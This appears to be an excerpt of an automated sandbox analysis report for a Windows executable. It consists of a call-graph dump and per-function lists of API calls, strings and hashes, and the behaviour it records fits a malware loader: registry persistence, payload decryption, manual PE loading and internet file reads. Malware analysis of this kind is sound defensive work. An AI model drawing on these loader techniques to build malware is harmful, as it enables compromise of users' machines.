41448 4065fd 41444->41448 42673 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41445->42673 42680 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41447->42680 41457 402360 39 API calls 41448->41457 41453 4068bb 41449->41453 41450 406459 41454 402360 39 API calls 41450->41454 41456 40638b 41452->41456 41458 408260 53 API calls 41453->41458 41459 406461 41454->41459 41455 406522 41460 402360 39 API calls 41455->41460 41461 4063ac 41456->41461 41462 40638f 41456->41462 41464 406611 41457->41464 41465 4068c6 41458->41465 42674 4073e0 53 API calls 2 library calls 41459->42674 41467 40652a 41460->41467 42667 407150 53 API calls 2 library calls 41461->42667 42666 4070d0 53 API calls 2 library calls 41462->42666 41470 406693 41464->41470 41471 406615 41464->41471 41480 402430 43 API calls 41465->41480 42681 407700 53 API calls 2 library calls 41467->42681 41469 406394 41481 402430 43 API calls 41469->41481 42696 407c40 53 API calls 2 library calls 41470->42696 42690 407ab0 53 API calls 2 library calls 41471->42690 41472 406466 41483 402430 43 API calls 41472->41483 41474 4063b1 41484 402430 43 API calls 41474->41484 41477 40652f 41488 402430 43 API calls 41477->41488 41478 406698 41490 402430 43 API calls 41478->41490 41479 40661a 41491 402430 43 API calls 41479->41491 41482 4068d9 41480->41482 41485 4063a4 41481->41485 41486 408d60 43 API calls 41482->41486 41487 406476 41483->41487 41489 4063c1 41484->41489 42715 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41485->42715 41492 4068ee 41486->41492 41502 402360 39 API calls 41487->41502 41493 40653f 41488->41493 41504 402360 39 API calls 41489->41504 41495 4066a8 41490->41495 41496 40662a 41491->41496 41497 408dc0 43 API calls 41492->41497 42682 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41493->42682 41511 402360 39 API calls 41495->41511 42691 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41496->42691 41501 406906 41497->41501 41499 406855 41499->41404 41506 
402360 39 API calls 41499->41506 41508 408e70 43 API calls 41501->41508 41509 40648a 41502->41509 41503 406548 41510 402360 39 API calls 41503->41510 41505 4063d5 41504->41505 41505->41404 42668 4071e0 53 API calls 2 library calls 41505->42668 41506->41404 41507 406633 41512 402360 39 API calls 41507->41512 41513 40691b 41508->41513 41514 406498 41509->41514 41515 40648e 41509->41515 41516 406550 41510->41516 41520 4066bc 41511->41520 41521 40663b 41512->41521 41522 408dc0 43 API calls 41513->41522 42676 4074f0 53 API calls 2 library calls 41514->42676 42675 407470 53 API calls 2 library calls 41515->42675 42683 407780 53 API calls 2 library calls 41516->42683 41527 4066c0 41520->41527 41528 40673e 41520->41528 42692 407b30 53 API calls 2 library calls 41521->42692 41524 406933 41522->41524 41530 408e70 43 API calls 41524->41530 41525 406555 41538 402430 43 API calls 41525->41538 41526 40649d 41539 402430 43 API calls 41526->41539 42697 407cd0 53 API calls 2 library calls 41527->42697 42703 407e50 53 API calls 2 library calls 41528->42703 41534 406948 41530->41534 41533 406640 41540 402430 43 API calls 41533->41540 41537 408dc0 43 API calls 41534->41537 41535 406743 41544 402430 43 API calls 41535->41544 41536 4066c5 41545 402430 43 API calls 41536->41545 41541 406960 41537->41541 41542 406565 41538->41542 41543 4064ad 41539->41543 41546 406650 41540->41546 41547 402360 39 API calls 41541->41547 42684 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41542->42684 41558 402360 39 API calls 41543->41558 41549 406753 41544->41549 41550 4066d5 41545->41550 42693 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41546->42693 41552 40696e 41547->41552 41564 402360 39 API calls 41549->41564 42698 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41550->42698 41556 402360 39 API calls 41552->41556 41553 40656e 41557 402360 39 API calls 41553->41557 41555 406659 41560 402360 39 API calls 41555->41560 41561 406979 41556->41561 41562 406576 
41557->41562 41563 4064c1 41558->41563 41559 4066de 41565 402360 39 API calls 41559->41565 41566 406661 41560->41566 41567 402360 39 API calls 41561->41567 42685 407800 53 API calls 2 library calls 41562->42685 41563->41404 42677 407580 53 API calls 2 library calls 41563->42677 41569 406767 41564->41569 41570 4066e6 41565->41570 42694 407bc0 53 API calls 2 library calls 41566->42694 41572 406984 41567->41572 41575 40676b 41569->41575 41576 4067be 41569->41576 42699 407d50 53 API calls 2 library calls 41570->42699 41579 402360 39 API calls 41572->41579 41573 40657b 41586 402430 43 API calls 41573->41586 42704 407ee0 53 API calls 2 library calls 41575->42704 42709 408060 53 API calls 2 library calls 41576->42709 41578 406666 41588 402430 43 API calls 41578->41588 41582 40698f 41579->41582 41581 4066eb 41591 402430 43 API calls 41581->41591 41585 402360 39 API calls 41582->41585 41584 406770 41596 402430 43 API calls 41584->41596 41589 40699a 41585->41589 41590 40658b 41586->41590 41587 4067c3 41595 402430 43 API calls 41587->41595 41592 406676 41588->41592 41593 402360 39 API calls 41589->41593 41600 402360 39 API calls 41590->41600 41597 4066fb 41591->41597 42695 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41592->42695 41594 4069a5 41593->41594 41599 402360 39 API calls 41594->41599 41601 4067d3 41595->41601 41602 406780 41596->41602 42700 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41597->42700 41605 4069b0 41599->41605 41606 40659f 41600->41606 41616 402360 39 API calls 41601->41616 42705 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41602->42705 41604 40667f 41609 402360 39 API calls 41604->41609 41610 402360 39 API calls 41605->41610 41611 4065a8 41606->41611 42686 407890 53 API calls 2 library calls 41606->42686 41608 406704 41613 402360 39 API calls 41608->41613 41609->41404 41653 4069bf 41610->41653 42687 407910 53 API calls 2 library calls 41611->42687 41612 406789 41618 402360 39 API calls 41612->41618 41614 40670c 
41613->41614 42701 407dd0 53 API calls 2 library calls 41614->42701 41621 4067e7 41616->41621 41619 406791 41618->41619 42706 407f60 53 API calls 2 library calls 41619->42706 41621->41404 42710 4080e0 53 API calls 2 library calls 41621->42710 41622 4065b2 41628 402430 43 API calls 41622->41628 41624 406711 41629 402430 43 API calls 41624->41629 41625 406796 41631 402430 43 API calls 41625->41631 41627 4067f0 41636 402430 43 API calls 41627->41636 41630 4065c2 41628->41630 41632 406721 41629->41632 41637 402360 39 API calls 41630->41637 41634 4067a6 41631->41634 42702 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41632->42702 41633 406a1e Sleep 41633->41653 42707 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41634->42707 41640 406800 41636->41640 41641 4065d6 41637->41641 41639 40672a 41643 402360 39 API calls 41639->41643 42711 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41640->42711 41641->41404 42688 4079a0 53 API calls 2 library calls 41641->42688 41642 4067af 41647 402360 39 API calls 41642->41647 41643->41404 41644 402430 43 API calls 41644->41653 41646 406809 41648 402360 39 API calls 41646->41648 41650 4067b7 41647->41650 41651 406811 41648->41651 42708 407fe0 53 API calls 2 library calls 41650->42708 42712 408160 53 API calls 2 library calls 41651->42712 41653->41633 41653->41644 41654 406a27 41653->41654 41660 406a16 41653->41660 41657 402360 39 API calls 41654->41657 41656 406816 41664 402430 43 API calls 41656->41664 41658 406a2f 41657->41658 41661 408c40 43 API calls 41658->41661 41659 4067bc 41662 402430 43 API calls 41659->41662 41663 402360 39 API calls 41660->41663 41665 406a40 41661->41665 41662->41485 41663->41633 41666 406826 41664->41666 41667 408c40 43 API calls 41665->41667 42713 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41666->42713 41670 40682f 41672 402360 39 API calls 41670->41672 41675 406837 41672->41675 42714 4081e0 53 API calls 2 library calls 41675->42714 41729 40b530 
CallUnexpected 41728->41729 41730 403d7b GetTempPathA 41729->41730 41731 403db7 41730->41731 41731->41731 41732 402730 43 API calls 41731->41732 41740 403dd3 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41732->41740 41735 4092d0 43 API calls 41735->41740 41736 403f02 CreateDirectoryA Sleep 41737 403f30 CallUnexpected 41736->41737 41736->41740 41742 409b4a 41 API calls 41737->41742 41738 404f20 41739 40cfaf 39 API calls 41738->41739 41741 404f43 41739->41741 41740->41735 41740->41736 41740->41738 43015 410681 41740->43015 43018 403c30 41740->43018 41743 4107e2 GetSystemTimeAsFileTime 41741->41743 41746 403f64 CallUnexpected 41742->41746 41744 404f9f 41743->41744 41745 4106a2 39 API calls 41744->41745 41747 404fa8 CallUnexpected 41745->41747 41750 40402b 41746->41750 43033 409c85 6 API calls 41746->43033 41751 409b4a 41 API calls 41747->41751 41749 403fe2 41749->41750 43034 409f97 42 API calls 41749->43034 41752 402730 43 API calls 41750->41752 41777 404ffc CallUnexpected std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41751->41777 41754 4040a2 41752->41754 41756 4092d0 43 API calls 41754->41756 41755 40401e 43035 409c3b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 41755->43035 41758 4040cd 41756->41758 41758->41738 41759 404147 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41758->41759 41764 404207 41759->41764 43036 409c85 6 API calls 41759->43036 41762 4041b1 41762->41764 43037 409f97 42 API calls 41762->43037 41767 402730 43 API calls 41764->41767 41765 402730 43 API calls 41765->41777 41771 404262 41767->41771 41768 4092d0 43 API calls 41768->41777 41769 4041fa 43038 409c3b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 41769->43038 41772 4092d0 43 API calls 41771->41772 41774 404281 41772->41774 41776 401e20 44 API calls 41774->41776 41775 401e20 44 API calls 41775->41777 41783 404312 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41776->41783 41777->41765 41777->41768 41777->41775 41778 4052d0 Sleep 
41777->41778 41779 4058bd 41777->41779 41785 402470 43 API calls 41777->41785 41790 4052e0 CallUnexpected 41777->41790 43052 409c85 6 API calls 41777->43052 43053 409f97 42 API calls 41777->43053 43054 409c3b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 41777->43054 41778->41777 41781 40cfaf 39 API calls 41779->41781 41780 4043e7 CallUnexpected 41786 409b4a 41 API calls 41780->41786 41782 4058c2 RegCreateKeyExA RegOpenKeyExA RegSetValueExA RegCloseKey 41781->41782 41787 405964 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41782->41787 41783->41780 43024 4021f0 41783->43024 41785->41777 41794 40441b CallUnexpected 41786->41794 41789 405a22 41787->41789 41791 405a0a std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41787->41791 41793 40cfaf 39 API calls 41789->41793 41798 409b4a 41 API calls 41790->41798 41792 4099d7 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 41791->41792 41795 405a1e 41792->41795 41796 405a27 41793->41796 41802 4044fc 41794->41802 43039 409c85 6 API calls 41794->43039 41795->41092 41800 4107e2 GetSystemTimeAsFileTime 41796->41800 41861 405315 __InternalCxxFrameHandler CallUnexpected std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41798->41861 41799 4044a6 41799->41802 43040 409f97 42 API calls 41799->43040 41801 405a7f 41800->41801 41804 4106a2 39 API calls 41801->41804 41805 402730 43 API calls 41802->41805 41807 405a88 Sleep 41804->41807 41808 40455d 41805->41808 41806 4044ef 43041 409c3b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 41806->43041 41811 402730 43 API calls 41807->41811 41809 4092d0 43 API calls 41808->41809 41814 404588 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41809->41814 41833 405aba 41811->41833 41813 402730 43 API calls 41813->41861 41821 4046c2 41814->41821 43042 409c85 6 API calls 41814->43042 41815 402730 43 API calls 41888 405c80 __InternalCxxFrameHandler CallUnexpected std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41815->41888 41818 405bc6 
__InternalCxxFrameHandler std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41818->41815 41818->41888 41819 40466c 41819->41821 43043 409f97 42 API calls 41819->43043 41820 4092d0 43 API calls 41820->41861 41825 402730 43 API calls 41821->41825 41822 40cfaf 39 API calls 41822->41888 41827 40471d 41825->41827 41829 4092d0 43 API calls 41827->41829 41828 4046b5 43044 409c3b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 41828->43044 41832 40473c 41829->41832 41830 401e20 44 API calls 41830->41861 41836 401e20 44 API calls 41832->41836 41833->41818 43058 4025a0 41 API calls 41833->43058 41835 403a90 43 API calls 41835->41888 41839 4047cd std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41836->41839 41837 4107b2 43 API calls 41837->41888 41838 409b4a 41 API calls 41838->41888 41840 4021f0 8 API calls 41839->41840 41842 404d05 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41839->41842 41844 4048b8 SHGetFolderPathA 41840->41844 41841 4061c5 41848 406c20 53 API calls 41841->41848 41852 404dc1 CoUninitialize 41842->41852 41843 405682 41846 40577c CoUninitialize 41843->41846 41844->41842 41847 4048d5 41844->41847 41845 40fb0d 15 API calls ___std_exception_copy 41845->41861 41854 405792 41846->41854 41859 40495a 41847->41859 43045 409c85 6 API calls 41847->43045 41849 4061ec 41848->41849 41857 402430 43 API calls 41849->41857 41851 408c40 43 API calls 41851->41861 41867 404dd1 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41852->41867 41862 4057ae CoUninitialize 41854->41862 41855 404911 41855->41859 43046 409f97 42 API calls 41855->43046 41856 4035b0 52 API calls 41856->41861 41864 4061fc 41857->41864 41865 402730 43 API calls 41859->41865 41860 402730 43 API calls 41860->41888 41861->41779 41861->41813 41861->41820 41861->41830 41861->41843 41861->41845 41861->41851 41861->41856 41866 402ec0 93 API calls 41861->41866 41894 403410 41 API calls 41861->41894 41910 405687 41861->41910 43055 409c85 6 API calls 41861->43055 43056 409f97 42 API calls 41861->43056 43057 
                                            APIs
                                            • GetTempPathA.KERNEL32(00000104,?,CA335CE0,75920F00,00000000), ref: 00403D8A
                                            • CreateDirectoryA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?), ref: 00403F19
                                            • Sleep.KERNEL32(000003E8), ref: 00403F22
                                            • __Init_thread_footer.LIBCMT ref: 004044F7
                                            • __Init_thread_footer.LIBCMT ref: 004046BD
                                            • SHGetFolderPathA.SHELL32(00000000,00000000,00000000,00000000,?,00000000,?,00406AA1,0041D805,0042DA9C,0042DA9D,?,00000000,00000000,0042DC1C,0042DC1D), ref: 004048C7
                                            • __Init_thread_footer.LIBCMT ref: 00404955
                                            • __Init_thread_footer.LIBCMT ref: 00404BBE
                                            • CoInitialize.OLE32(00000000), ref: 00404C3F
                                            • CoCreateInstance.OLE32(0041F290,00000000,00000001,0041F260,?,?,00406AA1,0041D805,0042DA9C,0042DA9D,?,00000000,00000000,0042DC1C,0042DC1D), ref: 00404C5A
                                            • __Init_thread_footer.LIBCMT ref: 004050BD
                                            • Sleep.KERNEL32(00000BB8,00000000,?,00406A81,0041D8A0,0042DB20,0042DB21), ref: 004052D5
                                            • __Init_thread_footer.LIBCMT ref: 004053CB
                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104,?,00406AA1,0041D805,0042DA9C,0042DA9D,?,00000000,00000000,0042DC1C,0042DC1D), ref: 00404CC8
                                              • Part of subcall function 004107E2: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,00405A7F,00000000,CA335CE0), ref: 004107F7
                                              • Part of subcall function 004107E2: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00410816
                                            • CoUninitialize.COMBASE(?,00406AA1,0041D805,0042DA9C,0042DA9D,?,00000000,00000000,0042DC1C,0042DC1D,?,?,?,?,00000000,0042DA28), ref: 00404D01
                                            • CoUninitialize.OLE32(?,?,0042DC1D,?,?,?,?,00000000,0042DA28,0042DA29), ref: 00404DC4
                                            • CoUninitialize.OLE32(?,?,?,?,?,0042DC1D,?,?,?,?,00000000,0042DA28,0042DA29), ref: 00404E45
                                            • __Init_thread_footer.LIBCMT ref: 00404026
                                              • Part of subcall function 00409C3B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401079,0042DA8C,0041DC90), ref: 00409C45
                                              • Part of subcall function 00409C3B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401079,0042DA8C,0041DC90), ref: 00409C78
                                              • Part of subcall function 00409C3B: RtlWakeAllConditionVariable.NTDLL ref: 00409CEF
                                              • Part of subcall function 004021F0: CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 00402226
                                              • Part of subcall function 004021F0: WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00402247
                                              • Part of subcall function 004021F0: CloseHandle.KERNEL32(00000000), ref: 0040224E
                                            • __Init_thread_footer.LIBCMT ref: 00404202
                                              • Part of subcall function 00409C85: EnterCriticalSection.KERNEL32(0042D064,?,?,?,00401044,0042DA8C), ref: 00409C90
                                              • Part of subcall function 00409C85: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,00401044,0042DA8C), ref: 00409CCD
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2922390836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: Init_thread_footer$CriticalSection$CreateFileUninitialize$EnterLeavePathSleepTime$ByteCharCloseConditionDirectoryFolderHandleInitializeInstanceMultiSystemTempUnothrow_t@std@@@VariableWakeWideWrite__ehfuncinfo$??2@
                                            • String ID: KDOX$SUB=$]DFE$^OX*$get$viFO
                                            • API String ID: 995133137-4208347134
                                            • Opcode ID: 2b5074e5ae3f74629323bde4956dacc6f2b5a6a8a3ea0f745ae83f81f010b08c
                                            • Instruction ID: 2a7656185698f67e8fe61b04cbca63a222de47e8cf16a67dea48f36782a400ee
                                            • Opcode Fuzzy Hash: 2b5074e5ae3f74629323bde4956dacc6f2b5a6a8a3ea0f745ae83f81f010b08c
                                            • Instruction Fuzzy Hash: 7BF2D1B0E042188BDB24DF24CC49B9EBBB1EF45304F5441E9E5097B2D2DB78AA85CF59
                                            APIs
                                              • Part of subcall function 004107E2: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,00405A7F,00000000,CA335CE0), ref: 004107F7
                                              • Part of subcall function 004107E2: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00410816
                                              • Part of subcall function 00409C85: EnterCriticalSection.KERNEL32(0042D064,?,?,?,00401044,0042DA8C), ref: 00409C90
                                              • Part of subcall function 00409C85: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,00401044,0042DA8C), ref: 00409CCD
                                            • __Init_thread_footer.LIBCMT ref: 004050BD
                                            • Sleep.KERNEL32(00000BB8,00000000,?,00406A81,0041D8A0,0042DB20,0042DB21), ref: 004052D5
                                            • __Init_thread_footer.LIBCMT ref: 004053CB
                                            • Sleep.KERNEL32(000007D0), ref: 00405735
                                            • Sleep.KERNEL32(000007D0), ref: 0040574F
                                            • CoUninitialize.OLE32(?,?,0042DB3D,?,?,?,?,?,?,?,?,?,?,00000000,0042DB21), ref: 00405785
                                            • CoUninitialize.OLE32(?,?,?,?,?,0042DB3D,?,?,?,?,?,?,?), ref: 004057B1
                                            • RegCreateKeyExA.ADVAPI32(80000001,?,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00405903
                                            • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020006,?), ref: 00405925
                                            • RegSetValueExA.ADVAPI32(?,?,00000000,00000001,?), ref: 0040594D
                                            • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00405956
                                            • Sleep.KERNEL32(000005DC), ref: 00405A90
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2922390836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: Sleep$CriticalInit_thread_footerSectionTimeUninitialize$CloseCreateEnterFileLeaveOpenSystemUnothrow_t@std@@@Value__ehfuncinfo$??2@
                                            • String ID: DFEK$SUB=$get$mixone$updateSW$U%
                                            • API String ID: 606935701-3680244588
                                            • Opcode ID: 4db77f0429fbeff6bc7245b50d1839831cba9557f07ad327e6d61b565521e7f7
                                            • Instruction ID: 0d5b8b6ccd7ac2cce54ba59243f10dcebe2db4c82d63bd9967a8cdfa7b9099a4
                                            • Opcode Fuzzy Hash: 4db77f0429fbeff6bc7245b50d1839831cba9557f07ad327e6d61b565521e7f7
                                            • Instruction Fuzzy Hash: F5D20471D001148BDB14EB24CC597AEBB75AF01308F5481BEE8097B2D2DB78AE85CF99

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            APIs
                                            • SetLastError.KERNEL32(0000000D), ref: 00402EE2
                                            • SetLastError.KERNEL32(000000C1), ref: 00402F24
                                            Strings
                                            • p.@P.@0.@, xrefs: 004030C5
                                            • alignedImageSize != AlignValueUp!, xrefs: 0040300C
                                            • FileHeader.Machine != HOST_MACHINE!, xrefs: 00402F93
                                            • ERROR_OUTOFMEMORY!, xrefs: 00403042
                                            • Section alignment invalid!, xrefs: 00402FA7
                                            • Signature != IMAGE_NT_SIGNATURE!, xrefs: 00402F81
                                            • Size is not valid!, xrefs: 00402EE8
                                            • DOS header is not valid!, xrefs: 00402F12
                                            • DOS header size is not valid!, xrefs: 00402F51
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2922390836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: ErrorLast
                                            • String ID: DOS header is not valid!$DOS header size is not valid!$ERROR_OUTOFMEMORY!$FileHeader.Machine != HOST_MACHINE!$Section alignment invalid!$Signature != IMAGE_NT_SIGNATURE!$Size is not valid!$alignedImageSize != AlignValueUp!$p.@P.@0.@
                                            • API String ID: 1452528299-2075088523
                                            • Opcode ID: 93a66e001e3ee66e65f00ee5565e1e2522c51b5cf1621d66301cec4e888181c2
                                            • Instruction ID: 9256140b0f890bfcd87a01f3051d579660d3e2dc250f0df49545701e60f9fd82
                                            • Opcode Fuzzy Hash: 93a66e001e3ee66e65f00ee5565e1e2522c51b5cf1621d66301cec4e888181c2
                                            • Instruction Fuzzy Hash: CCF1CE71B002059BCB10CFA9D985BAAB7B4BF48305F14417AE909EB3C2D779ED11CB98

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            APIs
                                            • CryptAcquireContextW.ADVAPI32(?,00000000,?,00000018,F0000000,CA335CE0), ref: 00403630
                                            • CryptCreateHash.ADVAPI32(?,0000800C,00000000,00000000,?), ref: 00403654
                                            • CryptHashData.ADVAPI32(?,00000000,?,00000000), ref: 004036BE
                                            • GetLastError.KERNEL32 ref: 004036C8
                                            • CryptDeriveKey.ADVAPI32(?,0000660E,?,00000000,?), ref: 004036F0
                                            • GetLastError.KERNEL32 ref: 004036FA
                                            • CryptReleaseContext.ADVAPI32(?,00000000), ref: 0040370A
                                            • CryptDecrypt.ADVAPI32(?,00000000,00000000,00000000,?,00000000), ref: 004037CC
                                            • CryptDestroyKey.ADVAPI32(?), ref: 0040383E
                                            Strings
                                            • Microsoft Enhanced RSA and AES Cryptographic Provider, xrefs: 0040360C
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2922390836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: Crypt$ContextErrorHashLast$AcquireCreateDataDecryptDeriveDestroyRelease
                                            • String ID: Microsoft Enhanced RSA and AES Cryptographic Provider
                                            • API String ID: 3761881897-63410773
                                            • Opcode ID: 7f6218a34b9754140a9e9fc40106ac4304b7aaa720599af0eabc3a8fdf2c6258
                                            • Instruction ID: 8181a1f98bd0149a833479ac616fd79743055c61a592a1420c0c523c4d9566d8
                                            • Opcode Fuzzy Hash: 7f6218a34b9754140a9e9fc40106ac4304b7aaa720599af0eabc3a8fdf2c6258
                                            • Instruction Fuzzy Hash: 37819171A00218AFEF209F25CC45B9ABBB9FF45300F0081BAF90DA7291DB359E858F55

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            APIs
                                            • VirtualProtect.KERNEL32(?,?,?,?), ref: 00402AC8
                                            • GetLastError.KERNEL32(00000400,?,00000000,00000000,?,?,?,?), ref: 00402ADD
                                            • FormatMessageA.KERNEL32(00001300,00000000,00000000,?,?,?,?), ref: 00402AEB
                                            • LocalAlloc.KERNEL32(00000040,?,?,?,?,?), ref: 00402B06
                                            • OutputDebugStringA.KERNEL32(00000000,?,?), ref: 00402B25
                                            • LocalFree.KERNEL32(00000000), ref: 00402B32
                                            • LocalFree.KERNEL32(?), ref: 00402B37
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2922390836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: Local$Free$AllocDebugErrorFormatLastMessageOutputProtectStringVirtual
                                            • String ID: %s: %s$Error protecting memory page
                                            • API String ID: 839691724-1484484497
                                            • Opcode ID: f25455ec320cf7d64a2bc5a19560f05570590d079a315ae6df6c255a1a5fbc21
                                            • Instruction ID: 0c0000675eadf2e66051917e59d7aa22c0aaa2fc97c5d5fe75df83e4770fcd9e
                                            • Opcode Fuzzy Hash: f25455ec320cf7d64a2bc5a19560f05570590d079a315ae6df6c255a1a5fbc21
                                            • Instruction Fuzzy Hash: 4B310731B00104AFDB10DF68DD44FAAB768EF48704F0541BEE905AB2D2DB75AE06CB98

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            APIs
                                            • InternetSetFilePointer.WININET(?,00000000,00000000,00000000,00000000), ref: 004019D5
                                            • InternetReadFile.WININET(?,00000000,000003E8,00000000), ref: 004019F8
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2922390836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: FileInternet$PointerRead
                                            • String ID: text
                                            • API String ID: 3197321146-999008199
                                            • Opcode ID: 5d2b67920e7965021a67acd32ea28e335973d0b9692ae9a2ead62ee0d6d92aa5
                                            • Instruction ID: 0125e10c814f2167b0c83c61a86ba883da1fe49b2781431745f5a2561ed14111
                                            • Opcode Fuzzy Hash: 5d2b67920e7965021a67acd32ea28e335973d0b9692ae9a2ead62ee0d6d92aa5
                                            • Instruction Fuzzy Hash: FAC15B709002189FDB24DF64CC85BD9B7B5EF49304F1041EAE509B72A1D778AE94CF99
                                            APIs
                                            • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00F0D0B6
                                            • Module32First.KERNEL32(00000000,00000224), ref: 00F0D0D6
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2923697726.0000000000F0C000.00000040.00000020.00020000.00000000.sdmp, Offset: 00F0C000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_f0c000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CreateFirstModule32SnapshotToolhelp32
                                            • String ID:
                                            • API String ID: 3833638111-0
                                            • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                            • Instruction ID: 3832b7c1d5ea91ef92033f612d840d2ae5a1a5d200003defcc347414a5a68a43
                                            • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                            • Instruction Fuzzy Hash: 09F09C315007106BD7303BF9DC8DB6E76ECAF45774F500529F656950C0D770EC466A51
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2922390836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: Sleep
                                            • String ID: emp$mixtwo
                                            • API String ID: 3472027048-2390925073
                                            • Opcode ID: 25b80a3ffdd21913e586197d89a1d0a7f06881a9f76e4fd5286830887ded5122
                                            • Instruction ID: d670b023532553bde9b5cd74a18030282768016b503e3e09e149c4df20b712b6
                                            • Opcode Fuzzy Hash: 25b80a3ffdd21913e586197d89a1d0a7f06881a9f76e4fd5286830887ded5122
                                            • Instruction Fuzzy Hash: 15F01CB161430457E7147F65ED1B7173EA4970271CFA006ADD8141F2C2E7FB861A8BE6

                                            Control-flow Graph

                                            APIs
                                            • __EH_prolog3_GS.LIBCMT ref: 1000152A
                                            • __cftof.LIBCMT ref: 10001624
                                            • InternetOpenA.WININET(?,?,?,00000000,00000000), ref: 1000163D
                                            • InternetSetOptionA.WININET(00000000,00000041,?,00000004), ref: 10001660
